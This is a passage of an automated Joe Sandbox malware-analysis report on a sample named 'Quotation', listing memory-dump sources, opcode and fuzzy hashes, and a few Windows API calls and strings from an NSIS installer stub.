                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4f9cc47817ce2a27419cc1554729b5e6b3daa3c2fcaa45fee1fa776e7296143e
                                                                                            • Instruction ID: 2be2746e2df6719900be8c6ca5670327bbcdfb2c401813fc96544efb253c3fc5
                                                                                            • Opcode Fuzzy Hash: 4f9cc47817ce2a27419cc1554729b5e6b3daa3c2fcaa45fee1fa776e7296143e
                                                                                            • Instruction Fuzzy Hash: 2B019671A00204CBDF00DFA5D84478AB7B5FF95311F548664D8085F256EB71ED46CBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c59743670a74d9927dba9db8413e5a1095fe6ea97d0dd890e70fd7f0c33dc626
                                                                                            • Instruction ID: 2c84cdead40134949fd0f8f4c760e924f74ed081654c923900db7ded2e414bbf
                                                                                            • Opcode Fuzzy Hash: c59743670a74d9927dba9db8413e5a1095fe6ea97d0dd890e70fd7f0c33dc626
                                                                                            • Instruction Fuzzy Hash: 4601FF387001200BEB50A6AED420B0FB3DADBC9B60F24883EE10AC7341EE61DC1367D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: baf6bfbc7b3c9f0441f1e0f21f1a81c7837b657dc3523f91a2218abe27cc7843
                                                                                            • Instruction ID: f47be44346262ef6a8eac1e5ce19a97c20f495dfdda1049b359dcb5f2c7a1266
                                                                                            • Opcode Fuzzy Hash: baf6bfbc7b3c9f0441f1e0f21f1a81c7837b657dc3523f91a2218abe27cc7843
                                                                                            • Instruction Fuzzy Hash: 98018F357000200FEBA68A7CD4A07AA77EADBCA750F18853DE14ADB342DE25DC03A781
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aaf28a57646f267f854cfa44a441ab75e110e4e1fe33644cf8ae05b52e06ef31
                                                                                            • Instruction ID: 4b2be85c2ea1d9d40161ff03b5bb5bac551b8dcd7173dcea608409b3696b5ba3
                                                                                            • Opcode Fuzzy Hash: aaf28a57646f267f854cfa44a441ab75e110e4e1fe33644cf8ae05b52e06ef31
                                                                                            • Instruction Fuzzy Hash: 6A018C397001200BEB959A7DD490B5F77EADBCA750F18883DE10AD7342DE25DC0263D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4e8949b6a8ea99dfd08c1074dc1f6c8fe2610bfb2d1eeb9e8a76186c13110605
                                                                                            • Instruction ID: fbf2438d8b55ee30730b4a5899afb2b896459305ce30be9f7221602b27751cff
                                                                                            • Opcode Fuzzy Hash: 4e8949b6a8ea99dfd08c1074dc1f6c8fe2610bfb2d1eeb9e8a76186c13110605
                                                                                            • Instruction Fuzzy Hash: F511C4B0F00348EFD705EFB4C45179D7BB6EB8A300F108169D544AB391EA705E029B52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47a982c8471062088d8b8cc0adc02b3fbc962e007f07aaae70dd416cff6c3ebe
                                                                                            • Instruction ID: 0f5b15a3fe8d6ede0a2e33929ea69eaa5dd806288970f560527d0984713fc01d
                                                                                            • Opcode Fuzzy Hash: 47a982c8471062088d8b8cc0adc02b3fbc962e007f07aaae70dd416cff6c3ebe
                                                                                            • Instruction Fuzzy Hash: F4018C387000248FE7A5DA7CD466B1FB7DAEB8A750F14882DE20AD7341EE25DC0267D1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 216808e3eaade48b4be74e44366dbf7ba69f32cacd0621f93e74df8b41d52923
                                                                                            • Instruction ID: 9b867878d5a9dbb179ac94e32ee796a376cf02ef9a251d5964f43aa7e5811645
                                                                                            • Opcode Fuzzy Hash: 216808e3eaade48b4be74e44366dbf7ba69f32cacd0621f93e74df8b41d52923
                                                                                            • Instruction Fuzzy Hash: 47F046313493015FD7042A78A8147AB3BBAEFC22A5B4600BBE905CB345DF648C0757F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86b63f07c86bc37c226e4c78d0126c9ab4c125dc0017a967a132c8b073d86e6a
                                                                                            • Instruction ID: 5d87f4b9d1edd2f9499e2337edd6a8577675927ce30083db122ea6ad2e15129b
                                                                                            • Opcode Fuzzy Hash: 86b63f07c86bc37c226e4c78d0126c9ab4c125dc0017a967a132c8b073d86e6a
                                                                                            • Instruction Fuzzy Hash: A901A7B0F00308EBE704EFB4C45179EBBBAEF89300F208279D505AB291FA705E019B52
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fa9fc182f49c0a5b873390f543914bd89d778d9d6a862a38d4633e415d97db9e
                                                                                            • Instruction ID: 562486bc678e25d066db8847d86aa2c21e4d21d37e24e9aa85981372ad287216
                                                                                            • Opcode Fuzzy Hash: fa9fc182f49c0a5b873390f543914bd89d778d9d6a862a38d4633e415d97db9e
                                                                                            • Instruction Fuzzy Hash: DCF0E530304205ABE6042AA9D814B3F339EAFC5792F11443AE606DB340DFA5DC0727F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dfb9ad15fd9a66c40dffa8d4758458ee8696f584f51824d6b55c235a789336bd
                                                                                            • Instruction ID: 35da702a548e0d1666d466a6d4e75ba1d9ba0c49a9a91840dfc5d6efc243928e
                                                                                            • Opcode Fuzzy Hash: dfb9ad15fd9a66c40dffa8d4758458ee8696f584f51824d6b55c235a789336bd
                                                                                            • Instruction Fuzzy Hash: ACF0C435B40104CFDB04DB64D9A8BAC77B2EF89726F6540A8E506AB7B0DB35AD42CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: dc0fdbdd67cd4952c8e411f312ed15012ca383dad638f3c0fb1995f86a719f2a
                                                                                            • Instruction ID: a2cbb662861b9f1d0e779a1c3d2ed633e4afadcb00da2b06037dd6673b52f582
                                                                                            • Opcode Fuzzy Hash: dc0fdbdd67cd4952c8e411f312ed15012ca383dad638f3c0fb1995f86a719f2a
                                                                                            • Instruction Fuzzy Hash: 57E08672A1535DBBFF40CE70C91578B77ACD743254F6548E6D404DB241E27ACA02B751
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f872ca5d154b4a2f689d868632a0d5fb90726f5d8b79381e07453d8d6f6fa621
                                                                                            • Instruction ID: 6c8055fb0e264a0ede0ba49a43159b308cc2eb2e5d45033c1c83e9a9b478527a
                                                                                            • Opcode Fuzzy Hash: f872ca5d154b4a2f689d868632a0d5fb90726f5d8b79381e07453d8d6f6fa621
                                                                                            • Instruction Fuzzy Hash: B5D02B219097085FD32E9568680475277ED571A341F454056E959CB242E7549D4D83D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6540d11536738ccd7a37eb613e3c33eec3851bc6457f084a51754c70e1d43b7d
                                                                                            • Instruction ID: ee12bc3676fd4939b5e9027b1cfbc7d39e4bd5ac877f1ed25b219669fdccc5a8
                                                                                            • Opcode Fuzzy Hash: 6540d11536738ccd7a37eb613e3c33eec3851bc6457f084a51754c70e1d43b7d
                                                                                            • Instruction Fuzzy Hash: ACE09A74940309CFDB28DFA5C494BAD7BB2BF45305F24486CD5219F2A0CB759945CB40
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774568179.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_150000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93c15e17758ce910bd2f31d6f76a10459bd8f22b4b28dc20034adcf6f06eb113
                                                                                            • Instruction ID: 138ed48256f1b6611d7ff0289fa820d3f91babc1c7d7f20db1cb13934cfff59f
                                                                                            • Opcode Fuzzy Hash: 93c15e17758ce910bd2f31d6f76a10459bd8f22b4b28dc20034adcf6f06eb113
                                                                                            • Instruction Fuzzy Hash: 51D05E34A05B14DBC32C9AA9E104652B7DABB49715B854419E45687A40CB60FD0587C0
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008001), ref: 004036F6
                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040371F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774680857.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.2774662015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774698645.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774718784.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774832518.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorModeVersion
                                                                                            • String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
                                                                                            • API String ID: 3050056751-1170945346
                                                                                            • Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                            • Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
                                                                                            • Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
                                                                                            • Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A
                                                                                            APIs
                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                            • wsprintfW.USER32 ref: 004061CF
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774680857.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.2774662015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774698645.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774718784.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774832518.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                            • API String ID: 2200240437-1946221925
                                                                                            • Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                            • Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
                                                                                            • Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
                                                                                            • Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004068EE
                                                                                              • Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
                                                                                              • Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
                                                                                              • Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2774680857.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.2774662015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774698645.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774718784.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.2774832518.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                            • String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
                                                                                            • API String ID: 2547128583-890815371
                                                                                            • Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                            • Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
                                                                                            • Opcode Fuzzy Hash: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
                                                                                            • Instruction Fuzzy Hash: FDD02B331022159BC7002F22AE0894F776DEF66350701403BF541F2230EB38C82295FD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.2802401619.000000003AB40000.00000040.00000800.00020000.00000000.sdmp, Offset: 3AB40000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_3ab40000_Quotation.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DR48$XM$XM$T48
                                                                                            • API String ID: 0-2741422437
                                                                                            • Opcode ID: c69575a1b75258cc9935391ead9064b2fffefbf67ca17e16591b436fc1c2fc05
                                                                                            • Instruction ID: b837a3514bc3c88ca4c09e5e794e144e8f92b7ea573647f4ba2fbc188eda9953
                                                                                            • Opcode Fuzzy Hash: c69575a1b75258cc9935391ead9064b2fffefbf67ca17e16591b436fc1c2fc05
                                                                                            • Instruction Fuzzy Hash: DBA14B74B012158FEB58DF78C850BAEB7B2EF89300F1485A9D409AB351DF369D82DB91